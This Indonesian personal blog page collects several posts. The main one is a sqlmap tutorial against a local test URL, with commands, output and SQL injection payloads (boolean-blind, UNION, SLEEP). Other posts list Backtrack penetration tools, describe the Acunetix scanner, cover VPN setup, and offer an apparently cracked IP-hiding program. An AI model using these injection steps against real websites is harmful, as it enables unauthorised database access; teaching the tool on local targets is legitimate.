Aksi Penetrasi SqlMap

Aksi Penetrasi

Sebelum kita melakukan Uji Coba terhadap tools ini, sebaiknya Downloads dulu toolsnya di Di Sini, kemudian Extrak, asumsi python telah terintstall, disini saya menggunakan Linux, jika anda menggunakn windows, silahkan download python untuk windows dan install, kemudian letakan sqlmap satu directory dengan tempat install python
Untuk menjalakan sqlmap cukup simple, cukup dengan memberikan perintah seperti $ python sqlmap.py maka secara otomatis sqlmap akan berjalan (bukan untuk exploitasi) hanya sekedar memeriksa apakah sudah bisa berjalan dengan baik atau tidak, untuk melihat opsi-opsi yang ada pada sqlmap bisa menggunakan perintah -h misalnya seperti $ python sqlmap.py -h maka layar command anda akan tampil deretan opsi-opsi yang bisa digunakan
Uji coba kali ini saya lakukan di komputer lokal, (bukan target asli) anda bisa mencobanya dengan target asli, tetapi resiko tanggung sendiri (UUITE) sudah jalan sekarang, so mendingan di lokal biar lebih aman, kan hanya untuk sekedar belajar
Target saya beralamat di http://127.0.0.1/hantu.php?id=1 , untuk itu jalankan sqlmap, dan ikuti langkah berikut ini

Melakukan Fingerprinting (-f)

1
khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py -f -u http://127.0.0.1/hantu.php?id=1
perintah tersebut akan memerintahkan sqlmap untuk mencari tau vulner atau tidak alamat yang kita berikan, dan melakukan pendeteksian jenis dari database server yang digunakan, teknik yang digunakan, paramter yang bisa di inject serta jumlah kolom yang ada, berikut hasilnya
1
khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py -f -u http://127.0.0.1/hantu.php?id=1
Hasilnya seprti berikut
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[*] starting at: 22:54:00
[22:54:00] [INFO] using '/home/khairu/Desktop/sqlmap/output/127.0.0.1/session' as session file
[22:54:00] [INFO] testing connection to the target url
[22:54:00] [INFO] testing if the url is stable, wait a few seconds
[22:54:01] [INFO] url is stable
[22:54:01] [INFO] testing if GET parameter 'id' is dynamic
[22:54:01] [INFO] confirming that GET parameter 'id' is dynamic
[22:54:02] [INFO] GET parameter 'id' is dynamic
[22:54:02] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[22:54:02] [INFO] testing sql injection on GET parameter 'id'
[22:54:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:54:03] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[22:54:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:54:03] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:54:03] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[22:54:13] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[22:54:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[22:54:14] [INFO] target url appears to be UNION injectable with 6 columns
[22:54:14] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
Jika kita memberikan jawaban N untuk pertanyan "[22:54:14] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] maka kita akan disuguhkan informasi tentang payload dan informasi legkap lainya, seperti berikut
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
sqlmap identified the following injection points with a total of 27 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 9766=9766 AND 'eozw'='eozw
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,108,102,110,58),IFNULL(CAST(CHAR(90,108,100,67,103,114,118,81,113,110) AS CHAR),CHAR(32)),CHAR(58,104,107,118,58)), NULL# AND 'FznP'='FznP
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'iqxY'='iqxY
---
[22:59:52] [INFO] testing MySQL
[22:59:52] [INFO] confirming MySQL
[22:59:52] [INFO] the back-end DBMS is MySQL
[22:59:52] [INFO] actively fingerprinting MySQL
[22:59:52] [INFO] executing MySQL comment injection fingerprint
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
               comment injection fingerprint: MySQL 5.1.37
               html error message fingerprint: MySQL
[22:59:57] [INFO] Fetched data logged to text files under '/home/khairu/Desktop/sqlmap/output/127.0.0.1'
[*] shutting down at: 22:59:57

Banner Server (-b)

1
khairu@goblox:~/Desktop/sqlmap$ python sqlmap.py -b -u http://127.0.0.1/hantu.php?id=1
Perintah di atas sebenarnya tidak jauh berbeda dari perintah sebelumnya, hanya saja berbeda sedikit dari informasi yang di suguhkan untuk kita, berikut hasilnya


Tips dan cara Upgrade Baktrack 5r2 ke Backtrack 5r3

pertama-tama buka terminal dengan menekan
ctrl+alt+t
lalu ketikkan
1. Pastikan bahwa sistem yang sedang kita gunakan sekarang sudah up2date, untuk mengecek apakah sistem kita sudah up2date bisa menggunakan perintah :


root@bt:~# apt-get update

2. Setelah kita pastikan sistem kita sudah up2date, sekarang adalah melakukan upgrade dengan menggunakan perintah :

root@bt:~# apt-get dist-upgrade

3. Setelah proses upgrade diatas selesai maka lanjut ketahap untuk mengginstall aplikasi yang terbaru pada Backtrack 5 R3. Pada BackTrack 5 R3 ada perbedaan beberapa tool antar 32 bit dan 64 bit, jadi pastikan versi BackTrack yang sahabat gunakan.

selanjutnya :
 kita akan mendownload aplikiasi terbaru dari bactrack 5r3

P.O.C nya sebagai berikut




32-Bit Tools
apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler
64-Bit Tools
apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter multiforcer bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler
Semoga Bermanfaat dan

Cara Install Backtrack 5r2 - Tutorial Lengkap

Backtrack 5R2 menggunakan kernel Linux 3.2.6 yang telah disesuaikan untuk peningkatan dukungan jaringan perangkat nirkabel. Pembaruan dilakukan pula pada paket-paket yang telah ada dan juga  penambahan peralatan (tools) baru, sehingga kini Backtrack 5R2 menjadi distro penguji penetrasi yang memiliki piranti paling lengkap.
1
1
1
Peralatan-peralatan baru (Tools) yang ditambahkan dalam Backtrack 5 R2 ini diantaranya adalah;
  • arduino,
  • bluelog,
  • bt-audit,
  • dirb,
  • dnschef,
  • dpscan,
  • easy-creds,
  • extundelete,
  • findmyhash,
  • golismero,
  • goofile,
  • hashcat-gui,
  • hash-identifier,
  • hexorbase,
  • horst,
  • hotpatch,
  • joomscan,
  • killerbee,
  • libhijack,
  • magictree,
  • nipper-ng,
  • patator,
  • pipal,
  • pyrit,
  • reaver,
  • rebind,
  • rec-studio,
  • redfang,
  • se-toolkit,
  • sqlsus,
  • sslyze,
  • sucrack,
  • thc-ssl-dos,
  • tlssled,
  • uniscan,
  • vega,
  • watobo,
  • wce,
  • wol-e,
  • xspy.


Trik membuat Smartfreen Jadi Fast Loading - Work

Cara Membuat Smartfren  Bebas Lemot


Fakta yang ada memang sangat jauh berbeda dengan Slogan Smartfren sendiri "I hate Slow",yang ada di lapangan justru kebalikannya,Smartfren sungguh lelet minta ampun,bisa di lihat juga dari berbagai forum yang banyak menilai negatif bahkan tak jarang malah memaki Provider yang satu ini,tapi di sisi lain mengatakan bahwa penggunaan Smartfren lancar-lancar aja,sesekali lemot mungkin karena banyak pemakai pada jam tertentu.

Menyambung Postingan ane kemarin Cara Membuat Smartfren Anti Lelet Bebas Lemot Part 1 ,ada sedikit penjelasan logis tentang lemotnya Smartfren,Salah satunya adalah penerimaan sinyal EVDO yang kurang atau lemah,kita bisa mengatasinya terlebih dahulu dengan cara menguatkan sinyal modem seperti yang pernah ane bahas kemarin,ini syarat mutlak untuk mendapatkan koneksi/akses internet yang cepat dan stabil.

Statistic setelah penambahan antena eksternal

Pembahasan gambar di atas masih berdasar pada modem Air Flash AH009 EVDO Rev A,spesifikasi modem ini sudah pernah ane bahas di posting kemarin,untuk review lengkap bisa anda simak di sini.


Software Super Hide IP.3.1.5.6 Full version




Bingung,karena pas browsing mendadak halaman di blokir oleh penyedia layanan internet?atau tidak bisa masuk ke situs-situs tertentu karena ketentuan dan peraturan peyedia jasa internet di negara tertentu...nah ini solusinya.


Super Hide IP Melindungi privasi Anda di Internet. Gunakan super Hide IP untuk berselancar anonim, mencegah hacker dari pemantauan aktivitas online Anda atau pencuri identitas dari mencuri identitas Anda dan informasi pribadi lainnya, mengirim email anonim, dan un-ban diri dari forum atau situs web dibatasi.


Dengan Super Hide IP ,Anda dapat diberikan salah satu alamat IP palsu kita yang dapat dari berbagai negara seperti Amerika Serikat, Inggris, Perancis, dll super Sembunyikan IP bekerja dengan Internet Explorer, Firefox, Opera, Maxthon, MyIE dan kompatibel dengan semua jenis router, firewall, jaringan rumah, jaringan nirkabel dan jenis lain dari Internet.





Kecepatan internet saat menngunakan tool ini sangat tergantung dari kecepatan internet dari penyedia jasan internet yang anda gunakan,saat tool ini di aktifkan,otomatis kecepatan internet akan sedikit berkurang.
Bila speed internetnya kenceng,tidak akan menjadi masalah.

Link download di bawah ini

DONWLOAD  






Sekilas tentang Tools Acunetix Web Scanner

jika anda menggunakan jasa tools yang satu ini untuk mengaudit keamanan website anda. Namun, tools yang satu ini juga banyak di manfaatkan oleh para hacker untuk mengetauhi celah kemanan pada website target. Hahaha.. itulah realita.

Penggunaan aplikasi yang satu ini cukup mudah dan kaya akan fitur database of hacking menurut saya. karena hampir semua database kemanan lengkap dalam tools yang satu ini . Meliputi antara lain : Sql Injection , Xss, Site Crawler, Http editor, dan lain-lain . Anda cukup masukan alamat url website target dan scan :D

Berikut ini penjelasan dasar fitur-fitur Acunetix :




1. Web Scanner

Fitur yang satu ini kita gunakan untuk membedah isi perut dari website yang kita scan . dalam arti kata dengan melakukan scan kita bisa melihat struktur dan info dari website yang kita scan. Nah kadang banyak yang menggunakan untuk mencari direktori / file sensitif , seperti admin login, cgi, system, open port dsb .

biasanya terdiri dari duafase:

Crawling -

Pada tahap ini, crawler secara otomatis menganalisis website dan kemudian melihat struktur website target.

Scanning -

Pada tahap ini, Acunetix WvS melakukan Web scan Vullnerability terhadap website yang kita scan. Sehingga kita bisa memperoleh data-data yang sensitif dan penting :D

2. Blind Sql Injector

Blind SQL Injector adalah sebuah tools otomatis, dan bisa untuk membantu untuk mengetes secara manual SQL Injection yang kita lakukan. Tools ini juga mampu menghitung database, tabel, data dump dan juga membaca file tertentu pada sistem file dari web server jika SQL injection dieksploitasi ditemukan

3. HTTP Editor

Berguna untuk membuat request HTTP dan debug custom, HTTP requests and responses. dan juga mencakup encoding dan decoding. seperti encode / decode teks dan URL untuk hash MD5, UTF-7 format dan banyak format lainnya

4. HTTP Fuzzer

Dengan Fuzzer HTTP Anda dapat melakukan tes fuzzing, untuk menguji aplikasi data pada web yang invalid atau tidak kita ketauhi. Dengan tool ini Anda dapat dengan mudah menginput rule untuk kita uji.

Contoh : http://website.com/listproducts.php?cat=1 Kita dapat mengganti bagian terakhir dari URL '1 'dengan angka antara 1 sampai 999. Hanya hasil yang valid akan dilaporkan. Tingkat otomatisasi ini memungkinkan Anda untuk dengan cepat menguji hasil dari 1000 query tanpa harus melakukan satu persatu .


Sekian....

VPN gratis dan Cara Setting VPN di Windows Xp


Sebelum sobat blogger mulai menyetting VPN pada komputer masing masing, Sobat harus mempunyai hosting untuk VPN itu sendiri. dalam hal ini VPN bisa di dapatkan secara Premium alias berbayar. tapi di sini sobat blogger tenang saja, karna saya akan share VPN Free.

adapun Situs penyedia layanan VPN free bisa di kunjungi di sini http://freevpnhosting.com


adapun cara setting VPN di windows xp adalah sebagai berikut :




1. Masuk ke Network and Internet Connections yang ada di Control Panel.

2. Kemudian klik Create a connection to the network at my workplace, pilih Virtual Private Network connection, lalu Next.




3. Isi Company Name sesuka anda. Untuk memudahkan isi dengan nama VPN yang anda gunakan, contoh : freevpnhosting.com lalu Next.

4. Pada VPN Server Selection, isi dengan host name atau IP address server yang dituju untuk menghubungkan ke internet. Dalam hal ini, anda bisa menggunakan akun VPN Gratis




5. Centang Add a shotcut to this connection to my desktop jika anda ingin membuat shortcut PPTP di desktop. Kemudian klik Finish.

6. Untuk melakukan koneksi ke PPTP, anda tinggal klik dua kali shortcut di desktop, lalu isi User name dan Password anda. Dalam hal ini, User name dan Password VPN yang sudah anda ikuti atau daftar.



Sekian dulu tutorial singkat tentang cara setting VPN di windows XP, semoga bermanfaat bagi sobat blogger semua.

My First Post

By : M.Panji Ramadan Nst

site http://1dku.blogspot.com/

Di design hanya untuk kebutuhan personal. komitmen serta tempat penyimpanan referensi agar tidak lupa. karna manusia memiliki keterbatasan dalam mengingat sesuatu. dan di harapkan nantinya dapat membantu di segi kebutuhan informasi yang tidak terbatas.

blog ini juga nantinya dapat memberikan sesuatu yang berharga bagi para blogger semua, yang berkesempatan mengunjungi blog yang sederhana ini.
atas kunjungannya saya ucapkan terima kasih

regards,

Panji